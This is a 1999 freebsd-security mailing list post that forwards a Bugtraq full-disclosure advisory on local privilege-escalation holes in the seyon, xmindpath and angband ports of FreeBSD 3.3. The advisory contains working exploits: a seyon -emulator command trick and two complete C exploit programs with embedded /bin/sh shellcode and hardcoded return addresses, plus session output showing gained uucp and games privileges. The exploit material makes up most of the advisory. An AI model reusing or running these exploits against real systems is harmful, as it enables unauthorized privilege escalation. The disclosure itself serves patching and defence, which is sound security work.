From owner-freebsd-security Wed Dec 1 9:33:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from magnesium.net (toxic.magnesium.net [207.154.84.15]) by hub.freebsd.org (Postfix) with SMTP id DAA8015214 for ; Wed, 1 Dec 1999 09:32:57 -0800 (PST) (envelope-from unfurl@magnesium.net) Received: (qmail 72081 invoked by uid 1001); 1 Dec 1999 17:32:42 -0000 Date: 1 Dec 1999 09:32:42 -0800 Date: Wed, 1 Dec 1999 09:32:42 -0800 From: Bill Swingle To: security@freebsd.org Cc: Jordan Hubbard Subject: [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities] Message-ID: <19991201093242.A71817@dub.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, so I know these are all vulnerabilities in third party software, and that the actual problem with each program is not really ours to fix but each of these problems can be avoided with small changes to the respective ports. FreeBSD vulnerabilities are few and far between, and even fewer are published on Bugtraq. Having something as simple as this get past us is really embarassing. It says to the security community at large that we're not even concerned enough with security to fix these small holes. We all know that's not true. I'm not sure who dropped the ball here, and I'm not pointing fingers. I just hope that we can pull together in the future to avoid more of this. (just my .04) -Bill ----- Forwarded message from Brock Tellier ----- X-Mailer: USANET web-mailer (M3.4.0.33) Date: Tue, 30 Nov 1999 16:08:29 MST Reply-To: Brock Tellier From: Brock Tellier Subject: Several FreeBSD-3.3 vulnerabilities To: BUGTRAQ@SECURITYFOCUS.COM Greetings, RANT I've given the FreeBSD team about a month to get something official together. Maintainers were supposedly contacted, but no progress has been made. As promised, here are the goods: OVERVIEW Vulnerabilities in seyon, xmindpath and angband can be used to upgrade privileges. BACKGROUND All of the vulnerabilities discussed herein are based on my work on FreeBSD 3.3-RELEASE. Each of the programs was installed with the default permissions given when unpacked with sysinstall. These permissions are: -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath -r-xr-sr-x 1 bin games 481794 Sep 11 01:10 /usr/X11R6/bin/angband These programs may be installed on other systems with different permissions as a result of a version change or a different packing scheme. DETAILS Vuln #1 The Seyon Mess To summarize: Seyon was supposedly not meant to run with additional privileges. There are numerous problems with seyon and I've probably not found all of them. They are: Buffer Overflows: 1. $HOME 2. seyon -emulator $BUF 3. seyon -modems $BUF 4. many long text box input string overflows while in program Input Validation: 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with fullprivs (as noted in previous advisory) 2. seyon -emulator /program/to/execute/with/full/privs These privileges might be upgradable to root if you are able to a. trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or similar c. snoop device i/o. Vuln #2 xmindpath /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer overflow which will allow any user to gain uucp privs. Simply enough: xmindpath -f $BUF See my "faxalter" advisory for more info on gaining root w/euid uucp. Vuln #3 fun and egid games Want to impress your friends with the highest tetris score known to man? Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The overflows are: angband -u$BUF angband -d$BUF EXPLOITS Seyon: I've not written buffer overflow exploits for Seyon since an equivalent-yield program execution vulnerability exists, but it is certianly possible. The latter exploit is: seyon -emulator /program/to/execute Note that you'll have to execute a program that will ignore the args that seyon passes to it automatically as shown: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec) xmindpath: bash-2.03$ ls -la `which xmindpath`; id -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) bash-2.03$ ./xmindx FreeBSD xmindpath exploit /path/to/xmindpath -f $RET Brock Tellier btellier@usa.net Using addr: 0xbfbfcfa8 bash-2.03$ xmindpath -f $RET lock open: File name too long $ id uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec) $ /* * * FreeBSD 3.3 xmindpath exploit gives euid uucp * Compile: gcc -o xmindx xmindx.c * Usage: ./xmindx /path/to/mindpath -f $RET * Brock Tellier * */ #include #include char shell[]= /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; #define EGGLEN 2048 #define RETLEN 279 #define ALIGN 3 #define NOP 0x90 int main(int argc, char *argv[]) { long int offset=0; int i; int egglen = EGGLEN; int retlen = RETLEN; long int addr = 0xbfbfcfa8; char egg[EGGLEN]; char ret[RETLEN]; if (argc == 2) offset = atoi(argv[1]); addr=addr + offset; fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\n", addr); memset(egg,NOP,egglen); memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell)); for(i=ALIGN;i< retlen;i+=4) *(int *)&ret[i]=addr; memcpy(egg, "EGG=", 4); putenv(egg); memcpy(ret,"RET=",4); putenv(ret); system("/usr/local/bin/bash"); } angband: bash-2.03$ gcc -o angames angames.c bash-2.03$ angband `./angames` eip=0xbfbfc6b4 offset=0 buflen=1095 NOPs to 1021 Shellcode to 1088 eip to 1092 garbage to 1094 $ id uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec) $ /* FreeBSD 3.3 angband exploit yields egid of group games * usage: gcc -o angames angames.c /path/to/angband `./angames ` * overflow is 1088bytes of NOP/Shellcode + 4bytes EIP +2bytes garbage * Brock Tellier */ #include char shell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 1095; /* 2bytes"-u" + overflowed buf's bytes + */ char buf[bsize]; /* 4bytesEBP + 4bytesEIP + 2bytesGarbage */ char arg[bsize + 2]; int eip = 0xbfbfc6b4; /* FreeBSD 3.3 */ if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 1021; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[x++] = 'X'; buf[x++] = 'X'; fprintf(stderr, "garbage to %d\n", x); buf[bsize - 1] = '\0'; sprintf(arg, "-u%s", buf); arg[bsize + 1] = '\0'; printf("%s", arg); } Brock Tellier UNIX Systems Administrator Chicago, IL, USA ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1 ----- End forwarded message ----- -- -=| --- B i l l S w i n g l e --- http://www.dub.net/ -=| unfurl@dub.net - unfurl@freebsd.org - bill@cdrom.com -=| Different all twisty a of in maze are you, passages little To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message